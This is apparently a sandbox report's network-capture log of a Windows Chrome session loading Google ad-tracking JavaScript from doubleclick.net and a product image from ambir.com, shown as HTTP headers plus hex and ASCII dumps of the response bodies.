                                                                                                                                                                                              Host: googleads.g.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: test_cookie=CheckForPermission
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:27 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; expires=Fri, 01-Aug-2008 22:45:55 GMT; SameSite=none; Secure
                                                                                                                                                                                              Set-Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr; expires=Fri, 20-Nov-2026 20:28:27 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:28 UTC379INData Raw: 31 32 64 39 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 61 2c 63 29 7b 69 66 28 62 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 62 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 62 3b 62 5b 61 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 62 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                              Data Ascii: 12d9(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&global
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1390INData Raw: 2b 61 29 7b 76 61 72 20 63 3d 62 5b 61 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 3b 7d 20 76 61 72 20 6d 3d 6b 28 74 68 69 73 29 2c 6e 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 28 22 78 22 29 3d 3d 3d 22 73 79 6d 62 6f 6c 22 2c 71 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 62 2c 61 2c 63 29 7b 69 66 28 21 63 7c 7c 62 21 3d 6e 75 6c 6c 29 7b 63 3d 74 5b 61 5d 3b 69 66 28 63 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 20 62 5b 61 5d 3b 63 3d 62 5b 63 5d 3b 72 65 74 75 72 6e 20 63 21 3d 3d 76 6f 69
                                                                                                                                                                                              Data Ascii: +a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==voi
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1390INData Raw: 4f 62 6a 65 63 74 2c 7b 7d 2c 44 29 3b 61 26 26 28 61 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 26 26 28 63 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 3d 61 2e 61 74 74 72 69 62 75 74 69 6f 6e 52 65 70 6f 72 74 69 6e 67 29 2c 61 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 26 26 28 63 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 3d 61 2e 62 72 6f 77 73 69 6e 67 54 6f 70 69 63 73 29 29 3b 74 72 79 7b 76 61 72 20 64 3d 7a 2e 66 65 74 63 68 28 62 2c 63 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 7d 7d 69 66 28 61 26 26 61 2e 6e 6f 46 61 6c 6c 62 61 63 6b 29 72 65
                                                                                                                                                                                              Data Ascii: Object,{},D);a&&(a.attributionReporting&&(c.attributionReporting=a.attributionReporting),a.browsingTopics&&(c.browsingTopics=a.browsingTopics));try{var d=z.fetch(b,c);if(d)return d.then(function(){}).catch(function(){}),!0}catch(e){}}if(a&&a.noFallback)re
                                                                                                                                                                                              2024-11-20 20:28:28 UTC1390INData Raw: 7d 3b 66 75 6e 63 74 69 6f 6e 20 55 28 62 2c 61 2c 63 2c 64 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 2d 2d 67 3b 69 66 28 67 3c 3d 30 29 7b 76 61 72 20 6c 3b 28 6c 3d 62 2e 47 6f 6f 67 6c 65 62 51 68 43 73 4f 29 7c 7c 28 6c 3d 7b 7d 29 3b 76 61 72 20 4f 3d 6c 5b 61 5d 3b 4f 26 26 28 64 65 6c 65 74 65 20 6c 5b 61 5d 2c 28 6c 3d 4f 5b 30 5d 29 26 26 6c 2e 63 61 6c 6c 26 26 6c 28 29 29 7d 7d 64 3d 64 3d 3d 3d 76 6f 69 64 20 30 3f 5b 5d 3a 64 3b 66 6f 72 28 76 61 72 20 67 3d 63 2e 6c 65 6e 67 74 68 2b 31 2c 66 3d 7b 67 3a 30 7d 3b 66 2e 67 3c 63 2e 6c 65 6e 67 74 68 3b 66 3d 7b 67 3a 66 2e 67 7d 2c 66 2e 67 2b 2b 29 7b 76 61 72 20 72 3d 4e 75 6d 62 65 72 28 54 28 63 5b 66 2e 67 5d 29 29 2c 70 3d 6e 75 6c 6c 3b 72 21 3d 3d 31 26 26 72 21 3d 3d 32 7c 7c 21
                                                                                                                                                                                              Data Ascii: };function U(b,a,c,d){function e(){--g;if(g<=0){var l;(l=b.GooglebQhCsO)||(l={});var O=l[a];O&&(delete l[a],(l=O[0])&&l.call&&l())}}d=d===void 0?[]:d;for(var g=c.length+1,f={g:0};f.g<c.length;f={g:f.g},f.g++){var r=Number(T(c[f.g])),p=null;r!==1&&r!==2||!
                                                                                                                                                                                              2024-11-20 20:28:28 UTC284INData Raw: 30 5c 78 32 36 75 61 6d 5c 78 33 64 5c 78 32 36 75 61 70 5c 78 33 64 57 69 6e 64 6f 77 73 5c 78 32 36 75 61 70 76 5c 78 33 64 31 30 2e 30 2e 30 5c 78 32 36 75 61 77 5c 78 33 64 30 5c 78 32 36 66 6c 65 64 67 65 5c 78 33 64 31 5c 78 32 36 64 61 74 61 5c 78 33 64 65 76 65 6e 74 25 33 44 67 74 61 67 2e 63 6f 6e 66 69 67 5c 78 32 36 72 66 6d 74 5c 78 33 64 33 5c 78 32 36 66 6d 74 5c 78 33 64 33 5c 78 32 36 69 73 5f 76 74 63 5c 78 33 64 31 5c 78 32 36 63 69 64 5c 78 33 64 43 41 51 53 4b 51 43 61 37 4c 37 64 31 53 6c 4e 52 50 46 76 58 5f 45 53 59 2d 59 6c 4b 7a 4f 51 41 50 62 38 46 72 71 6e 77 75 37 65 76 6a 39 4a 4b 39 4e 63 33 4b 4d 53 66 6c 62 58 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 31 33 33 39 31 30 35 32 35 31 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33
                                                                                                                                                                                              Data Ascii: 0\x26uam\x3d\x26uap\x3dWindows\x26uapv\x3d10.0.0\x26uaw\x3d0\x26fledge\x3d1\x26data\x3devent%3Dgtag.config\x26rfmt\x3d3\x26fmt\x3d3\x26is_vtc\x3d1\x26cid\x3dCAQSKQCa7L7d1SlNRPFvX_ESY-YlKzOQAPb8Frqnwu7evj9JK9Nc3KMSflbX\x26random\x3d1339105251\x26rmt_tld\x3
                                                                                                                                                                                              2024-11-20 20:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              89192.168.2.549827141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1654OUTGET /wp-content/uploads/2023/10/card-document-scanners_225h.jpg HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:27 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:27 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 16914
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origSize=18292
                                                                                                                                                                                              ETag: "657cdd1d-4774"
                                                                                                                                                                                              Last-Modified: Fri, 15 Dec 2023 23:11:25 GMT
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13789
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fc1094215a3-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:27 UTC891INData Raw: ff d8 ff e1 00 02 ff e1 00 02 ff db 00 84 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c2 00 11 08 00 e1 01 bb 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 01 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 02 01 0a 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                              Data Ascii: "6
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: eb ce 4a ad 48 65 cd 7b de 78 d3 27 ed bc b6 d7 e0 fd 88 9a ed 40 8b 80 03 4c 77 3b 5a ce 52 65 ac 59 f4 cc f4 6c 5f 18 bc 69 15 a1 68 d2 e5 69 45 76 f5 c5 b3 27 e8 1d 21 3e 73 fb 9f dd 52 e4 01 5c ce 38 e3 a8 e6 83 f9 df d9 83 9f 91 3a 15 32 73 c6 d4 e9 7e 2f ce 75 1a e0 dc d9 df 07 b7 46 b1 7f 4f 31 8f a7 87 3b 7e 5a fb 31 df 87 61 9e 3d 9a 87 a5 9b f9 cc 93 21 cc d9 35 b2 e3 9a b4 bc 97 bc 4b 07 e9 7d 78 b4 66 8b 83 c5 32 6c 89 e6 66 60 a7 7c a9 43 2d 1d ff 00 e7 4f 4b cc f6 00 00 62 6c b3 43 38 4f 27 46 86 4b c1 bb 62 96 5f cb de 96 50 2a 75 89 32 81 eb d4 b9 de 5c 93 af fb 00 43 a1 5c 23 1b 60 5c cf 88 88 d5 8a 14 52 e2 9a b5 e7 89 d9 08 f4 b2 ad f6 9d 30 54 6e cc 71 70 99 9e 6a a5 10 85 16 d4 a5 1f 74 4f 7a 2d 93 45 f1 4f 4d a1 1c 9d a2 75 b6 8c 72
                                                                                                                                                                                              Data Ascii: JHe{x'@Lw;ZReYl_ihiEv'!>sR\8:2s~/uFO1;~Z1a=!5K}xf2lf`|C-OKblC8O'FKb_P*u2\C\#`\R0TnqpjtOz-EOMur
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 43 2c 42 b8 f8 49 eb 2f c3 9e 53 56 e5 71 6c 63 a6 e9 a2 92 09 91 04 1d 9d c1 57 de 20 fd d9 54 2d 16 4a 4f f4 f6 ff 00 7d 1d a1 46 2c b0 0e e3 23 db 4e 98 1d 4d 1d 57 f5 35 b9 7a 20 9c de ad 2b 88 d9 4f cd 09 04 5e 19 a3 b6 b1 96 93 1f a1 91 fe 4d 15 bb d4 d7 e7 15 34 1e 36 59 43 a0 b2 4a 22 a1 55 50 5f b7 1f 3b af fb ab a8 36 44 8e 86 69 1a 22 74 9d 35 41 ea 22 dd c3 58 a4 a2 ef 66 9c 98 df e3 05 2f f2 4f 53 24 94 31 11 e9 6d 58 dc 4e 37 f6 b6 68 38 6e 8f 2d cd 4a 1c e4 8e 70 74 d3 eb cb 24 45 90 2b 59 b0 66 a3 d3 f5 67 a6 30 ed 80 76 67 ac 53 5c df 04 94 6b 45 af 01 ba a8 ef 1c 18 82 50 15 a4 c3 5e 58 bb 92 f1 a3 aa 73 e8 0a 68 dc de a4 d1 62 6d 42 88 9b 72 7a 13 d8 55 00 c1 cf 4e b9 e9 7d cb a1 83 71 76 d6 69 96 09 3c 8f 20 40 c1 31 5d 37 1f b5 50 df
                                                                                                                                                                                              Data Ascii: C,BI/SVqlcW T-JO}F,#NMW5z +O^M46YCJ"UP_;6Di"t5A"Xf/OS$1mXN7h8n-Jpt$E+Yfg0vgS\kEP^XshbmBrzUN}qvi< @1]7P
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 6c ce d7 4d 50 70 a6 b4 f9 e3 b4 05 25 9b b9 c6 b7 bb 35 bb 33 93 63 1b d4 82 20 6e ec ef 5f b7 76 57 a8 d1 71 75 ee 71 10 02 e2 ab ec 4f b2 95 b1 ef e4 52 49 c0 86 2f bd b9 28 2e 7e e5 32 47 85 23 87 72 21 d6 16 eb de d6 6d eb 68 b5 66 e2 5c 5c 08 8d 37 90 e4 cd c1 94 9e ce 21 9a b8 3b 08 57 a5 2a eb 93 d2 59 07 41 41 28 a7 f9 16 4d 21 f5 15 fb 63 50 2c 89 fc b6 90 6b 94 4a e4 ff 00 d7 24 e1 5c b5 02 87 70 79 eb 5a d6 b5 24 a6 e3 95 2a c0 24 d2 c6 51 5f d8 e2 11 9f 6a c6 8e d5 0d a1 ec d6 9b a8 89 1c 24 a3 85 ae 58 22 a6 e0 8c 96 c8 12 9d bc 64 63 9c 3e 48 4e 65 55 52 62 3c 94 de 51 bb bd c0 87 6c 14 4c 0b 15 8b 92 bd 62 dd e1 6b 88 9c 7c b5 f9 68 a6 56 6e ad 65 58 a8 64 9d e2 bb 39 29 9c 87 00 d4 cf 8c fb ab aa e8 a2 ed c1 84 44 a4 74 a8 6d e6 95 da 62
                                                                                                                                                                                              Data Ascii: lMPp%53c n_vWquqORI/(.~2G#r!mhf\\7!;W*YAA(M!cP,kJ$\pyZ$*$Q_j$X"dc>HNeURb<QlLbk|hVneXd9)Dtmb
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 98 8d 74 c4 6b a5 a3 5d 31 1a e9 88 d7 4c 46 ba 62 3f 6e 98 8d 74 c4 6b a6 a3 5d 39 1a e1 dd e1 e3 b2 54 ec 11 7d 87 44 0d 47 66 53 51 e3 8a 34 a4 50 52 91 34 a4 55 0b 15 93 f4 ff 00 54 9f 99 5e 1c be b2 3e 48 7c ca e7 4d 14 21 27 e3 f7 72 d6 78 2d e4 5b 08 37 78 a9 5a 20 65 8c 76 0b 3f 7c 5d d6 f4 12 31 6c ca 98 01 00 3c be 97 89 c9 41 4a f9 b5 da 50 4d 1e ba d1 a8 27 35 30 96 ba c8 d7 59 1a 6f 36 91 1c 24 77 25 bc 6c d1 55 43 a8 a5 d9 69 0a 6c c1 39 6b 8a 3d db d1 5a 2b ac 1a ba c1 a8 f3 7b 40 06 ba b1 a8 65 8f 58 29 f1 8f 9a 98 6b f0 68 14 24 0a 14 4a 34 66 a5 1a 3b 02 8d 29 1a 51 a5 22 82 94 89 a1 8c 39 3c 4a 66 4b 1f f2 9c b0 ee 84 75 49 4b 76 51 ca 7b 0d 03 69 83 05 fb 6b d0 0d 3c 3e 9f 8a 17 5a e5 78 a4 a8 0f 5b a9 75 96 6c e5 fb b1 b6 24 26 6f 09
                                                                                                                                                                                              Data Ascii: tk]1LFb?ntk]9T}DGfSQ4PR4UT^>H|M!'rx-[7xZ ev?|]1l<AJPM'50Yo6$w%lUCil9k=Z+{@eX)kh$J4f;)Q"9<JfKuIKvQ{ik<>Zx[ul$&o
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 57 38 b8 93 4e d2 4d f6 93 c1 da a9 69 a9 a9 a3 d1 ac 83 41 7b eb a7 26 d5 28 ec 56 20 e2 03 51 fd 54 8a 36 ba 46 b8 34 5c 5e c2 ca 36 97 46 c2 e6 ba da 82 bf dd b3 ff 00 d4 8d 72 95 e4 94 66 c9 52 f7 31 a6 36 67 b1 02 fb 06 aa 9b 12 cd 4f 08 99 f1 3e 9c b0 81 99 ad b5 ce 97 e1 03 d1 d8 a9 31 69 ae 6d c1 a4 73 4f 37 8d 6b dd 3d c6 39 98 d9 18 48 20 e5 22 e3 4e 24 4a 25 12 89 44 ed f9 af cb 20 a6 74 51 fe 27 f0 47 ad 47 6a bc 69 ff 00 2d 92 fb 77 bd 91 8f 37 85 fa 4a 27 b8 66 0e 36 89 ee ef 6b 81 09 83 30 e5 6d 50 1d 9c 20 a5 8e 37 8d b6 0f b7 ed 34 2a e8 05 f5 d5 e0 2c 56 37 31 db 22 05 96 ed db f3 dd 67 d7 4b 15 28 e8 2e cc 7b 9a 50 d2 9a 94 9b f4 e9 ed fa 97 92 14 74 6f cc 4b 86 66 bb 97 98 a6 d2 c7 23 46 87 2b ce bc 7c 7d 0a 48 dc 33 0b 65 6d 8d ee 9c
                                                                                                                                                                                              Data Ascii: W8NMiA{&(V QT6F4\^6FrfR16gO>1imsO7k=9H "N$J%D tQ'GGji-w7J'f6k0mP 74*,V71"gK(.{PtoKf#F+|}H3em
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: c5 21 51 c3 bf 34 dc 3d a4 e6 bf 49 ba c3 e3 0d 2c 6c 6e 63 1f f6 6f ae ab 0c aa cd bf 09 18 61 90 70 40 d8 35 51 d5 c3 70 00 bc 57 f5 2a 69 65 c2 a1 99 b5 55 75 37 c9 c2 6e 6b 33 2e de 3e f5 0b 1b 21 a5 8c 38 b4 5b ed 7d 05 1e 14 c8 29 77 b3 14 92 42 f7 bd c1 d1 b5 d7 3c 2b 6d 27 89 62 f4 cc 82 69 32 b9 91 d1 c6 07 36 bb 76 f3 ac 2f 0d a3 a3 ae aa 64 13 49 10 7b a4 61 0e da 2e eb 0e 10 58 ce 33 2c d0 33 21 64 0c 70 d0 0b 86 dd ad b7 7a c3 f1 30 d0 db ef d5 92 39 ad 77 37 8d 7e e5 4b 43 7e 70 1c 7b d4 50 8f ea e0 ff 00 25 19 35 22 58 e5 87 3f 05 b7 07 5d 4f 31 2a 6a 52 2a 23 0e 89 91 c9 99 d9 db a8 f6 ae 35 26 69 e8 d8 68 66 3f 7a 2e 08 fd 9c a7 af ea d2 5a 7c 47 85 35 b8 a1 1f 11 d3 a8 f8 23 21 f5 9c 08 4f 93 08 3a 9b f1 66 77 73 4f 82 e5 ee 39 45 bd c7
                                                                                                                                                                                              Data Ascii: !Q4=I,lncoap@5QpW*ieUu7nk3.>!8[})wB<+m'bi26v/dI{a.X3,3!dpz09w7~KC~p{P%5"X?]O1*jR*#5&ihf?z.Z|G5#!O:fwsO9E
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: a4 cd 93 79 d6 de 4e 6c fd f6 5b d8 b1 f1 76 9f 5a a7 cd ae d6 ba c7 d6 a0 cb 63 6d 65 51 c7 6e 7a 84 d8 a2 ce c7 30 bd 93 b3 33 41 69 17 17 e3 d5 6e 83 11 22 37 e6 8e 7f 96 43 be c6 38 da 38 16 b7 52 9d d2 18 63 6b 03 a4 aa 6d f4 16 bf 06 c1 4b 4e 03 79 24 6e a2 ea 18 cc 9a 7f 38 6e 96 e8 4c 73 e6 a0 a9 82 a2 d1 1b 9d b9 0f 8b cc f5 47 5c 5f e4 da 4b ac 1a 5a 6a 1c 36 66 d4 ef 95 2d 20 bd ed d5 a1 a0 f3 db 5f 0d 38 9d 94 35 51 54 54 b3 8f 79 d5 a4 8e 82 e0 7a 01 54 d5 30 c6 f7 39 8d 7b 99 76 92 36 8b 85 59 0d f9 cd 8f 7a 78 3d 05 39 14 13 dc 3a d4 c4 f4 a0 c7 28 7b 0a ce de a5 3b 7a d6 57 26 22 42 3c 64 ad b3 3e 79 7b 65 77 d0 0b 91 44 f9 07 e8 70 bf 75 14 1c 43 78 9a 35 54 12 bb f1 1b 2a 48 d9 d3 72 aa 32 03 e4 b4 2a c9 1d 7e 57 2b 93 6b a8 ee 85 83 d8
                                                                                                                                                                                              Data Ascii: yNl[vZcmeQnz03Ain"7C88RckmKNy$n8nLsG\_KZj6f- _85QTTyzT09{v6Yzx=9:({;zW&"B<d>y{ewDpuCx5T*Hr2*~W+k
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 53 93 93 0c 90 b5 ed 32 30 1b 17 36 fa 8b f4 2d ca d4 65 71 69 63 1b 58 6c de 0d 88 e7 04 9c dd 20 71 5d 6e 7e a0 3e 28 da da 83 bf fe 75 f7 8e e4 6b a5 c3 65 f3 c7 22 a1 75 14 05 8d fc 89 93 3d 9d 6d 4d d1 45 1d ae 0d 45 14 7f 3d 83 55 c4 7c e6 3b d9 f3 c2 08 20 9a 9a ae 3a 17 0b a5 65 ed 4c 8c f3 ef 96 45 8f 94 68 c6 b7 50 de 7e 9f ac 6c 66 09 93 ac ca f2 8f 81 f6 8a 28 19 25 ad e3 11 75 86 6f d5 4f 63 a4 b3 9f 94 06 b4 5c 9b ac 1a 95 a4 71 1a b0 b0 7a 4d 97 fe 36 36 2c 0e 99 f9 76 da a8 2c 06 9d b9 9c 18 db d5 0d 5c 76 05 83 d3 3a 5b 91 91 b5 40 ba f7 b7 af 45 82 53 97 9b 80 df 94 8b dc 6d 0b 0b 31 55 c2 1a e7 34 3e e2 ce 17 1d c5 46 1b 1c f5 0e 6b d9 c6 36 eb 7f 09 e1 3e 8e a8 75 16 3b dd f4 81 04 10 fa d3 78 46 97 7b 17 d8 4b 1c 6e de b0 f5 be 46 fe
                                                                                                                                                                                              Data Ascii: S206-eqicXl q]n~>(uke"u=mMEE=U|; :eLEhP~lf(%uoOc\qzM66,v,\v:[@ESm1U4>Fk6>u;xF{KnF
                                                                                                                                                                                              2024-11-20 20:28:27 UTC1369INData Raw: 31 ac 94 5e 74 5b 0e 0e 1f 4f 57 e9 38 42 42 e1 59 42 af 8b a2 c6 84 0c e2 a1 b1 3a 5a f2 50 94 b1 75 1c 5e 10 2f d0 52 bd 07 c5 45 97 8b 48 f5 fe 3e 07 df f8 a9 28 77 29 3f 91 de 09 8c 8a 2c 08 07 00 03 d2 3e aa dc 4b 40 ea 2b 57 37 c6 ec 65 51 7f 9d 55 ce 2e 8d 95 57 aa c6 a6 1e b0 97 50 b7 56 21 0d 38 ef 0c 45 d6 b3 40 b1 61 97 14 d5 99 53 9b 95 4a 27 f2 6d 23 bc cd cc 50 64 6e b2 e3 86 55 bf a1 f9 a5 9d 7a 01 ef 35 eb 7e b3 dc 25 ee 33 89 1e 96 7e 9a 34 80 67 9d 98 c5 7a cd 35 0b 7d 8f f1 69 fe 99 65 84 cc 84 51 a6 d8 b4 e9 b6 d0 a0 11 10 34 71 10 1e 66 b0 5d 20 49 61 68 68 be c4 d9 91 b2 cf e6 2b 2d 16 3b 14 ba 1d 23 27 77 dc d5 de 03 04 c6 64 2d 34 11 c2 3b 30 48 70 01 7c 68 d7 5e 1f 45 7e 93 84 6d 6d d9 ad d0 a1 05 e4 aa 61 4c 22 fa c5 55 82 e1 43
                                                                                                                                                                                              Data Ascii: 1^t[OW8BBYB:ZPu^/REH>(w)?,>K@+W7eQU.WPV!8E@aSJ'm#PdnUz5~%3~4gz5}ieQ4qf] Iahh+-;#'wd-4;0Hp|h^E~mmaL"UC


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              90192.168.2.54982613.107.246.63443
